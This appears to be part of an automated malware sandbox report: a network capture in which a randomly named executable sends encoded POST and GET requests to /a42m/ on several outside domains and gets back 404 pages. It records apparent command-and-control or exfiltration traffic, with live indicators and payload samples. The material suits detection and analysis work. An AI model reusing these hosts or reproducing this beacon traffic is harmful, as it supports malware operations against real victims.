                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:13.612622976 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                          May 23, 2024 15:17:13.617400885 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                          May 23, 2024 15:17:13.617435932 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.553656162.240.81.18807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:16.224153996 CEST1796OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.tintasmaiscor.com
                          Origin: http://www.tintasmaiscor.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.tintasmaiscor.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 4d 59 70 37 78 52 45 6f 32 6c 57 6d 72 52 43 72 68 39 61 2f 73 54 38 73 72 2f 36 74 58 2f 78 55 4b 66 53 54 43 37 52 68 6a 4d 4c 74 4f 4a 33 70 6d 4d 6b 4a 71 53 31 44 6a 4d 56 7a 54 78 31 42 62 49 59 4f 55 75 6d 55 6e 54 33 32 6c 70 5a 65 66 4e 53 4c 41 6f 2f 38 46 74 55 37 39 6c 61 37 68 62 61 75 5a 6b 37 73 72 4f 72 71 56 72 4f 4c 30 6e 34 42 66 66 49 64 33 6b 67 38 73 77 72 51 64 5a 68 7a 59 34 42 38 52 6d 57 4d 45 4b 6e 65 4e 6a 6c 2b 66 62 36 44 4c 48 6e 37 71 4d 4b 74 53 52 6a 62 31 31 63 38 73 75 43 4e 77 62 6f 66 72 48 76 43 52 56 4b 42 49 2f 4b 7a 48 6d 72 71 68 73 36 57 36 67 51 67 37 4c 74 4b 41 52 6a 51 4d 70 7a 4f 72 45 52 4e 76 52 39 65 6e 39 64 67 65 57 44 70 74 2f 66 74 30 64 6d 47 70 6e 61 72 5a 62 71 37 64 47 6b 54 4e 73 6c 69 6e 67 79 4f 4d 55 4c 6e 42 56 78 6c 6b 4a 6b 55 76 45 55 61 63 51 7a 2f 42 2b 72 56 6d 4f 32 41 31 6c 49 4e 75 4b 78 73 69 42 54 57 34 71 67 62 6f 71 43 37 43 4f 34 39 68 6b 42 34 77 71 6f 62 78 68 66 73 69 79 64 50 74 65 69 4e 70 6b 66 65 77 6e [TRUNCATED]
                          Data Ascii: vH5=MYp7xREo2lWmrRCrh9a/sT8sr/6tX/xUKfSTC7RhjMLtOJ3pmMkJqS1DjMVzTx1BbIYOUumUnT32lpZefNSLAo/8FtU79la7hbauZk7srOrqVrOL0n4BffId3kg8swrQdZhzY4B8RmWMEKneNjl+fb6DLHn7qMKtSRjb11c8suCNwbofrHvCRVKBI/KzHmrqhs6W6gQg7LtKARjQMpzOrERNvR9en9dgeWDpt/ft0dmGpnarZbq7dGkTNslingyOMULnBVxlkJkUvEUacQz/B+rVmO2A1lINuKxsiBTW4qgboqC7CO49hkB4wqobxhfsiydPteiNpkfewnKAf4eqehDnPupuTYLbQXR55Dpjtrg5z2mrUNxNo4C0ykZPYVXjGU0Nrbk2Km/8X16KU/rpDZImqjylc4ykVPVHuA7VZdKqOmIwhx5fYejNDnXUOkBQF3Tn2xSqNosz4B5Z0GO2I4XheGX+66j6Jj9OeJzK3Z4QeDASxFxZLOD8T4Vfl0HXKP78CvQPRZAGHRwDy6IC06pSo4mbmebgDhDLRfiAMMBNHP2hj5eg/a5BM3ZL0UqSjwc4KZs4/glH7bf+61i3BP/1SZO6prfV5ganXclLb7rKGmVZjjztcLmETXafRMZvY1Pn4mZmlPqV6kPATLQTBEnYnrGIs7wh/dJibZcwnA+RlTcqzLTxu7oJy4nbCCwj45c00C251bHxuQ9jtZyA+nfu1Iw3EJdMzF0/DraKLCcWKUoSU90jH1wNLdALMGq/DQC0moBEKimLc6Gk044hQULabem0rtEmwRaxOypOmgSFWrGctF6bcSzY2vZCkI03ZhWrC/9KduTJCHDfL1J0WqqbJ3rfCR3aEZQIKv6Ql+NhH69JlU4WzmnUJr1yxGqOQ6i7l4Row4O/V6Jyl/y4FkiAK7qBHYX04sRzmLIaPeaaKpxoMWS9c5a/aVs5WmeEnu+9nt2eX02dflHWhIPOtil8thwXY13YKxJIjVWMxIIPlxkO [TRUNCATED]
                          May 23, 2024 15:17:16.787184954 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:16 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:16.789999008 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                          May 23, 2024 15:17:16.792588949 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                          Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                          May 23, 2024 15:17:16.792620897 CEST224INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                          Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distr
                          May 23, 2024 15:17:16.845016003 CEST903INData Raw: 69 62 75 74 65 64 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 46 65 64 6f 72 61 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 74 3e 2f 75 73
                          Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.553657162.240.81.18807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:18.761145115 CEST487OUTGET /a42m/?R0nl4=f64p&vH5=BaBbynwG2FaMiw+m+oe/pVgQl9HtQpBnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0AZj8SPVeonrFiOinbxCwnOWiWMOKy28ccO1L5nk/mSSCeg== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.tintasmaiscor.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:17:19.336457968 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:19 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:19.337523937 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                          May 23, 2024 15:17:19.341311932 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                          May 23, 2024 15:17:19.341347933 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.553658162.0.237.22807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:24.415113926 CEST762OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.crimsoncascade.xyz
                          Origin: http://www.crimsoncascade.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.crimsoncascade.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 44 59 71 52 68 56 2b 30 79 50 4f 33 51 6d 49 47 2b 38 6c 5a 71 5a 43 61 39 4b 45 45 5a 6a 48 77 37 62 38 65 6b 69 72 2b 39 53 78 56 76 70 48 50 4b 50 75 58 53 6a 45 4a 62 7a 75 66 7a 7a 52 64 78 48 6f 78 5a 48 75 6f 37 45 6d 50 62 42 7a 6f 78 55 45 59 76 35 67 5a 70 4e 69 45 62 6e 4d 61 36 76 67 44 39 65 6f 67 4f 31 53 53 61 39 6e 58 75 52 33 59 6a 61 50 35 54 51 35 77 45 67 77 4c 42 50 53 54 34 4b 70 64 33 65 41 47 44 6f 57 41 39 34 6d 54 2b 72 76 4f 42 62 30 41 31 49 41 30 2b 2f 47 70 57 72 44 48 77 55 72 76 30 41 46 45 64 72 43 54 4c 43 37 30 78 49 75 75 34 5a 75 48 66 4d 4a 71 44 31 63 3d
                          Data Ascii: vH5=DYqRhV+0yPO3QmIG+8lZqZCa9KEEZjHw7b8ekir+9SxVvpHPKPuXSjEJbzufzzRdxHoxZHuo7EmPbBzoxUEYv5gZpNiEbnMa6vgD9eogO1SSa9nXuR3YjaP5TQ5wEgwLBPST4Kpd3eAGDoWA94mT+rvOBb0A1IA0+/GpWrDHwUrv0AFEdrCTLC70xIuu4ZuHfMJqD1c=
                          May 23, 2024 15:17:25.002605915 CEST533INHTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:24 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.553659162.0.237.22807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:26.949980974 CEST782OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.crimsoncascade.xyz
                          Origin: http://www.crimsoncascade.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.crimsoncascade.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 44 59 71 52 68 56 2b 30 79 50 4f 33 52 46 67 47 34 76 39 5a 72 35 43 62 68 61 45 45 4d 54 48 30 37 62 77 65 6b 6e 4c 55 38 6b 68 56 75 4d 72 50 4c 4c 43 58 52 6a 45 4a 55 54 75 51 74 44 52 43 78 47 56 45 5a 47 53 6f 37 45 79 50 62 41 44 6f 78 6a 59 62 75 70 67 66 6b 74 69 47 56 48 4d 61 36 76 67 44 39 61 41 4f 4f 31 4b 53 62 4f 2f 58 74 77 33 62 39 71 50 36 55 51 35 77 56 51 77 48 42 50 53 39 34 50 4a 6e 33 59 4d 47 44 70 6d 41 39 70 6d 53 6c 37 76 4d 46 62 30 54 6b 62 59 37 30 76 76 6e 55 4b 65 61 67 31 54 36 38 57 6f 75 48 4a 4b 37 59 69 58 4d 68 62 6d 5a 70 70 50 75 46 76 5a 61 64 69 4c 57 38 41 6c 31 4d 47 49 45 47 66 74 6b 4f 34 7a 32 42 75 75 5a
                          Data Ascii: vH5=DYqRhV+0yPO3RFgG4v9Zr5CbhaEEMTH07bweknLU8khVuMrPLLCXRjEJUTuQtDRCxGVEZGSo7EyPbADoxjYbupgfktiGVHMa6vgD9aAOO1KSbO/Xtw3b9qP6UQ5wVQwHBPS94PJn3YMGDpmA9pmSl7vMFb0TkbY70vvnUKeag1T68WouHJK7YiXMhbmZppPuFvZadiLW8Al1MGIEGftkO4z2BuuZ
                          May 23, 2024 15:17:27.610160112 CEST533INHTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:27 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.553660162.0.237.22807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:29.484458923 CEST1799OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.crimsoncascade.xyz
                          Origin: http://www.crimsoncascade.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.crimsoncascade.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 44 59 71 52 68 56 2b 30 79 50 4f 33 52 46 67 47 34 76 39 5a 72 35 43 62 68 61 45 45 4d 54 48 30 37 62 77 65 6b 6e 4c 55 38 6b 70 56 75 36 2f 50 4c 71 43 58 51 6a 45 4a 5a 7a 75 41 74 44 52 4c 78 47 4e 41 5a 47 66 64 37 48 4b 50 4a 32 66 6f 34 79 59 62 6e 70 67 66 37 39 69 46 62 6e 4e 43 36 76 77 63 39 65 63 4f 4f 31 4b 53 62 4d 4c 58 35 78 33 62 2f 71 50 35 54 51 35 6b 45 67 77 72 42 50 61 4c 34 50 38 61 33 49 73 47 43 4a 32 41 2f 62 65 53 34 72 76 53 43 62 31 4f 6b 62 6c 37 30 70 4b 57 55 4b 71 77 67 79 33 36 74 54 64 55 57 5a 66 39 47 52 2f 6f 6b 6f 33 2b 32 75 7a 62 4f 2f 39 71 66 67 54 65 2b 53 6c 41 45 42 67 79 4c 2f 67 79 56 38 58 77 52 4a 7a 50 37 50 32 58 42 62 37 79 54 30 7a 2f 54 71 79 4b 76 41 62 59 57 39 38 7a 45 58 46 31 43 34 6f 76 36 6f 6b 69 6c 67 35 51 78 50 72 79 43 41 69 65 6f 64 37 59 71 62 4a 52 4d 32 6b 33 35 51 36 54 75 6b 46 36 63 41 4f 77 78 79 6e 31 54 77 46 47 42 4f 4c 49 68 61 4e 46 54 37 79 45 2b 70 31 66 68 53 4e 41 73 59 32 6f 39 42 6b 69 72 32 4d 4c 6d 32 [TRUNCATED]
